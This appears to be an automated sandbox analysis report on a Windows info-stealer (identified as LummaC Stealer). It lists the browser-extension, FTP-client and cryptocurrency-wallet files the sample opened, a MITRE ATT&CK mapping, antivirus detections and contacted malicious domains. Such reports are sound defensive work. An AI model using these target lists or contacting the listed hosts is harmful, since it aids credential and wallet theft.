            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
            Source: Yara matchFile source: 00000000.00000003.1136637956.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 6392, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 6392, type: MEMORYSTR
            Source: Yara matchFile source: 0.2.file.exe.220000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		44
            Virtualization/Sandbox Evasion            		2
            OS Credential Dumping            		851
            Security Software Discovery            		Remote Services41
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory44
            Virtualization/Sandbox Evasion            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
            Obfuscated Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
            Software Packing            		NTDS1
            File and Directory Discovery            		Distributed Component Object ModelInput Capture114
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets223
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            file.exe64%VirustotalBrowse
            file.exe61%ReversingLabsWin32.Trojan.LummaStealer
            file.exe100%AviraTR/Crypt.TPM.Gen

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            orangemyther.live/IozZ100%Avira URL Cloudmalware
            begindecafer.world/QwdZdf100%Avira URL Cloudmalware
            https://www.gstatic.cn/recaptcha/0%Avira URL Cloudsafe
            https://community.cloudflare.steams:0%Avira URL Cloudsafe
            garagedrootz.top/oPsoJAN100%Avira URL Cloudmalware
            https://fostinjec.today:443/LksNAzf100%Avira URL Cloudmalware
            https://begindecafer.world:443/QwdZdf100%Avira URL Cloudmalware
            catterjur.run/boSnzhu100%Avira URL Cloudmalware
            modelshiverd.icu/bJhnsj100%Avira URL Cloudmalware
            arisechairedd.shop/JnsHY100%Avira URL Cloudmalware
            https://arisechairedd.shop:443/JnsHY100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            steamcommunity.com
            		104.73.234.102
            		truefalse
              		high
              guntac.bet
              		188.114.97.3
              		truefalse
                		unknown
                modelshiverd.icu
                		unknown
                		unknownfalse
                  		high
                  garagedrootz.top
                  		unknown
                  		unknownfalse
                    		high
                    fostinjec.today
                    		unknown
                    		unknownfalse
                      		high
                      catterjur.run
                      		unknown
                      		unknownfalse
                        		high
                        sterpickced.digital
                        		unknown
                        		unknownfalse
                          		high
                          arisechairedd.shop
                          		unknown
                          		unknownfalse
                            		high
                            orangemyther.live
                            		unknown
                            		unknownfalse
                              		high
                              begindecafer.world
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                orangemyther.live/IozZtrue
                                • Avira URL Cloud: malware
                                		unknown
                                modelshiverd.icu/bJhnsjtrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://steamcommunity.com/profiles/76561199822375128false
                                  		high
                                  begindecafer.world/QwdZdftrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  garagedrootz.top/oPsoJANtrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  arisechairedd.shop/JnsHYtrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  catterjur.run/boSnzhutrue
                                  • Avira URL Cloud: malware
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://player.vimeo.comfile.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&amp;l=englifile.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=oQ1d_VAfa_ofile.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=N4H9vOOxi8kG&amp;l=english&amfile.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.gstatic.cn/recaptcha/file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://store.steampowered.com/account/coofile.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://steamcommunity.com/profiles/76561199822375128/badgesfile.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://steamcommunity.com/profiles/76561199822375128/inventory/file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=whw8EcafG167&ampfile.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&afile.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.youtube.comfile.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.google.comfile.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2Sfile.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=englfile.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
